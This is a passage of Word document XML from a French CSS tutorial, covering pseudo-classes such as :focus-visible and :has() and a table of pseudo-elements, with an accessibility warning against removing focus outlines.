              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Accessibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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:active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Pendant l'appui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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Retour tactile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:visited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lien déjà visité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Navigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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:disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Champ désactivé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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Formulaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Case ou radio cochée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Styles personnalisés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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:invalid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Champ invalide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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Signalement d'erreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:placeholder-shown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Placeholder affiché</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Étiquette flottante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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:first-child</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Premier enfant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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Listes, tableaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:nth-child(2n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Enfants pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lignes alternées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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:not(...)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Tout sauf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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Exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:has(...)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Parent contenant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mise en page conditionnelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Des états exprimés sans une seule classe supplémentaire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a:hover { text-decoration-thickness: 2px; }</w:t>
        <w:br/>
        <w:t>a:focus-visible {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  outline: 3px solid #e0a21b;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  outline-offset: 3px;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>button:disabled { opacity: .5; cursor: not-allowed; }</w:t>
        <w:br/>
        <w:t>tr:nth-child(even) { background: #f4f7f9; }</w:t>
        <w:br/>
        <w:t>input:not(:placeholder-shown) + label { transform: translateY(-1.2rem); }</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NE JAMAIS SUPPRIMER LE FOCUS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>outline: none</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sans remplacement prive les utilisateurs au clavier de tout repère. Si le contour natif vous déplaît, remplacez-le par un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>box-shadow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>outline</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> personnalisé visible sur tous les fonds.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
        </w:rPr>
        <w:t>:has()</w:t>
      </w:r>
      <w:r>
        <w:t>, le sélecteur de parent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Longtemps impossible en CSS, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:has()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet de styler un conteneur selon son contenu. Il est pris en charge par les navigateurs modernes depuis 2023 environ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois usages de `:has()`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Une carte qui contient une image reçoit un autre rembourrage */</w:t>
        <w:br/>
        <w:t>.carte:has(img) { padding-top: 0; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Un formulaire contenant un champ invalide affiche un message */</w:t>
        <w:br/>
        <w:t>form:has(input:invalid) .message-erreur { display: block; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Une section sans titre reste sans marge */</w:t>
        <w:br/>
        <w:t>section:not(:has(h2)) { margin-block: 0; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.2 Pseudo-éléments : créer sans ajouter de balise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un pseudo-élément crée une partie d'élément qui n'existe pas dans le HTML. Il sert à la décoration, jamais à porter du contenu essentiel : ce contenu serait invisible pour une partie des outils.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.35 — Huit pseudo-éléments et leur usage légitime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55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Pseudo-élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="340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Cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="306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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>::before</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contenu avant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Icône décorative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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::after</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="340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Contenu après</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="306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Flèche, séparateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>::first-line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Première ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lettrine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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::first-letter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="340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Première lettre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="306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Lettrine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>::selection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Texte sélectionné</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Couleur de surlignage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
